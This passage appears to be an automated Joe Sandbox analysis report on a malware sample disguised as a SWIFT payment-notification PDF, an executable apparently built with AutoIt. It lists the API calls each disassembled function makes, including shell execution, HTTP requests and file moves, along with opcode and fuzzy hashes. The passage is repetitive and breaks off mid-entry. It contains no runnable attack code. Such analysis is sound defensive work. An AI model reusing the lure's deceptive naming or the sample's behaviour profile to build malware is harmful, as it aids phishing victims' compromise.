                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                              • String ID: @
                                                                                                                              • API String ID: 4150878124-2766056989
                                                                                                                              • Opcode ID: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                                                                                                              • Instruction ID: 60a9f40d71a87185ad744a771aacdfc79ad0a16393efc777ae91d2f205fac39b
                                                                                                                              • Opcode Fuzzy Hash: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                                                                                                              • Instruction Fuzzy Hash: 0D51B972A00218ABCB10DFA5DD42FDEB778EFC9304F00459AFA05EB180D6B4BA45CB65
                                                                                                                              APIs
                                                                                                                              • ShellExecuteExW.SHELL32(0000003C), ref: 00457D67
                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00457E09
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CloseExecuteHandleShell
                                                                                                                              • String ID: <$@
                                                                                                                              • API String ID: 283469938-1426351568
                                                                                                                              • Opcode ID: 938918cd4ef1c36c2cd7ece6c408f91d9440cd1300e967c2fbf9be3e4e326766
                                                                                                                              • Instruction ID: b88a15a70aa0ad5f6f29005b2a8070d35214d1ef645994392ec84fe4d9ca6df0
                                                                                                                              • Opcode Fuzzy Hash: 938918cd4ef1c36c2cd7ece6c408f91d9440cd1300e967c2fbf9be3e4e326766
                                                                                                                              • Instruction Fuzzy Hash: C751D3719002089BDB10EFA1D985AAFB7B4EF44309F10446EED05AB352DB79ED49CB94
                                                                                                                              APIs
                                                                                                                              • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A87A
                                                                                                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A8C9
                                                                                                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0044A901
                                                                                                                                • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3705125965-3916222277
                                                                                                                              • Opcode ID: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                                                                                                              • Instruction ID: d28fa13b4dde737238ce5dcfaacd3c540a76458eeabd88e5a6b3f8614e5f537b
                                                                                                                              • Opcode Fuzzy Hash: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                                                                                                              • Instruction Fuzzy Hash: DB310B76A802047AE720EF56DC42FDFB7A8EBD9710F00851FFA0097281D6B5550987AC
                                                                                                                              APIs
                                                                                                                              • GetMenuItemInfoW.USER32 ref: 0045FAC4
                                                                                                                              • DeleteMenu.USER32(?,?,00000000), ref: 0045FB15
                                                                                                                              • DeleteMenu.USER32(00000000,?,00000000), ref: 0045FB68
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Menu$Delete$InfoItem
                                                                                                                              • String ID: 0
                                                                                                                              • API String ID: 135850232-4108050209
                                                                                                                              • Opcode ID: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                                                                                                              • Instruction ID: 2caf7e1b7ae413ca61a5456c92b2eab9e90ede26a48057f627e29f4096114103
                                                                                                                              • Opcode Fuzzy Hash: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                                                                                                              • Instruction Fuzzy Hash: CC41D2B1604201ABD710CF25CC45F17B7A9AF84315F148A2EFDA49B2C2D378E849CBA6
                                                                                                                              APIs
                                                                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0045085F
                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0045087D
                                                                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0045088E
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Window$Long
                                                                                                                              • String ID: SysTreeView32
                                                                                                                              • API String ID: 847901565-1698111956
                                                                                                                              • Opcode ID: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                                                                                                              • Instruction ID: 2f6c96d6d770cdd7f6b01965cae739f5ffbb06f7b8c4bfc7c6bf121f6b9a1f40
                                                                                                                              • Opcode Fuzzy Hash: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                                                                                                              • Instruction Fuzzy Hash: 34418D75500205ABEB10DF29DC84FEB33A8FB49325F20471AF865972D1D778E895CBA8
                                                                                                                              APIs
                                                                                                                              • LoadLibraryA.KERNEL32(?), ref: 00434B10
                                                                                                                              • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00434B88
                                                                                                                              • FreeLibrary.KERNEL32(?), ref: 00434B9F
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Library$AddressFreeLoadProc
                                                                                                                              • String ID: AU3_GetPluginDetails
                                                                                                                              • API String ID: 145871493-4132174516
                                                                                                                              • Opcode ID: 13d398ffd581ba87110cf5f5715acfa71de54c3c4dd01ec22dab8651e6fd5906
                                                                                                                              • Instruction ID: fc8523f5daf935d660d2a9c884068eb8da3e2fc1adb06f3317e0194b47a185ca
                                                                                                                              • Opcode Fuzzy Hash: 13d398ffd581ba87110cf5f5715acfa71de54c3c4dd01ec22dab8651e6fd5906
                                                                                                                              • Instruction Fuzzy Hash: C24107B9600605EFC710DF59D8C0E9AF7A5FF89304B1082AAEA1A8B311D735FD52CB95
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe,0040F545,C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe,004A90E8,C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe,?,0040F545), ref: 0041013C
                                                                                                                              • lstrcmpiW.KERNEL32(?,?), ref: 0044BC09
                                                                                                                              • MoveFileW.KERNEL32(?,?), ref: 0044BC3F
                                                                                                                              • SHFileOperationW.SHELL32(?), ref: 0044BD17
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: File$FullMoveNameOperationPathlstrcmpi
                                                                                                                              • String ID: \*.*
                                                                                                                              • API String ID: 1148786053-1173974218
                                                                                                                              • Opcode ID: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                                                                                                              • Instruction ID: cfb238852dc788c6f4e4306d35388aa956c556a9525b71239849112dc74cb112
                                                                                                                              • Opcode Fuzzy Hash: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                                                                                                              • Instruction Fuzzy Hash: 5C3184B1800219AACF14EFB1DC85ADEB3B5AF48304F5095EEE90997211EB35D748CB98
                                                                                                                              APIs
                                                                                                                              • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00450DFD
                                                                                                                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00450E16
                                                                                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00450E3E
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend$Window
                                                                                                                              • String ID: SysMonthCal32
                                                                                                                              • API String ID: 2326795674-1439706946
                                                                                                                              • Opcode ID: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                                                                                                                              • Instruction ID: 97bf4b40409f6c90460d1384a7672ac630dd7a2161d32aee0dcf483843136ede
                                                                                                                              • Opcode Fuzzy Hash: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                                                                                                                              • Instruction Fuzzy Hash: A93195752002046BDB10DEA9DC85FEB73BDEB9C724F104619FA24A72C1D6B4FC558B64
                                                                                                                              APIs
                                                                                                                              • DestroyWindow.USER32(00000000), ref: 00450A2F
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DestroyWindow
                                                                                                                              • String ID: msctls_updown32
                                                                                                                              • API String ID: 3375834691-2298589950
                                                                                                                              • Opcode ID: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                                                                                                              • Instruction ID: fccd3fcc05e4e2aaf5990a1cc96ccc3c6d01ef6560d5fec67e6c7c3c5f699695
                                                                                                                              • Opcode Fuzzy Hash: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                                                                                                              • Instruction Fuzzy Hash: 213182767402056FE710DF58EC81FAB3368FF99710F10411AFA009B282C7B5AC96C7A8
                                                                                                                              APIs
                                                                                                                              • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                                                                                                              • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                                                                                              • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorMode$DiskFreeSpace
                                                                                                                              • String ID: \VH
                                                                                                                              • API String ID: 1682464887-234962358
                                                                                                                              • Opcode ID: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                                                                                                              • Instruction ID: 72795a51c8fd7a71edb0939b11d44c3a5eb04741920228a3d2c34b8a4a3992bf
                                                                                                                              • Opcode Fuzzy Hash: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                                                                                                              • Instruction Fuzzy Hash: B5217171D002089FCB00EFA5D98499EBBB8FF48314F1184AAE805AB351D7349E05CB64
                                                                                                                              APIs
                                                                                                                              • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                                                                                                              • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                                                                                              • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorMode$DiskFreeSpace
                                                                                                                              • String ID: \VH
                                                                                                                              • API String ID: 1682464887-234962358
                                                                                                                              • Opcode ID: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                                                                                                              • Instruction ID: ae55674c87016058c86dc8d4ad6f5a536cd264dc70ae423c542bf2f5a0a67e7a
                                                                                                                              • Opcode Fuzzy Hash: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                                                                                                              • Instruction Fuzzy Hash: C9316F75E002089FCB00EFA5D985A9DBBB4FF48314F1080AAE904AB351CB75EE05CB94
                                                                                                                              APIs
                                                                                                                              • SetErrorMode.KERNEL32(00000001), ref: 0045D87B
                                                                                                                              • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D8F0
                                                                                                                              • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D93A
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorMode$DiskFreeSpace
                                                                                                                              • String ID: \VH
                                                                                                                              • API String ID: 1682464887-234962358
                                                                                                                              • Opcode ID: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                                                                                                              • Instruction ID: e5212c229d9c2069cdfe567d9572a18bb695f81ecf44ad0a977260396f8f3e20
                                                                                                                              • Opcode Fuzzy Hash: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                                                                                                              • Instruction Fuzzy Hash: E6316D75E002089FCB00EFA5D984A9EBBB4FF48314F1084AAE904AB351CB35DE05CB94
                                                                                                                              APIs
                                                                                                                              • SetErrorMode.KERNEL32(00000001), ref: 0045D37E
                                                                                                                              • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3F4
                                                                                                                              • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D437
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorMode$InformationVolume
                                                                                                                              • String ID: \VH
                                                                                                                              • API String ID: 2507767853-234962358
                                                                                                                              • Opcode ID: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                                                                                                              • Instruction ID: 9072e4f9bd6fffdf4d5f5b526d3ef1379cf95bcdbb04681c41660468616ecd75
                                                                                                                              • Opcode Fuzzy Hash: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                                                                                                              • Instruction Fuzzy Hash: E5213075A002099FC714EF95CD85EAEB7B8FF88300F1084AAE905A73A1D774EA45CB54
                                                                                                                              APIs
                                                                                                                              • SetErrorMode.KERNEL32(00000001), ref: 0045D55C
                                                                                                                              • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D5D2
                                                                                                                              • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D608
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorMode$InformationVolume
                                                                                                                              • String ID: \VH
                                                                                                                              • API String ID: 2507767853-234962358
                                                                                                                              • Opcode ID: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                                                                                                              • Instruction ID: 5d1496e5fec29648c5677f840c6a5ff7f703137340fc9510fe584f3610dc7e3a
                                                                                                                              • Opcode Fuzzy Hash: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
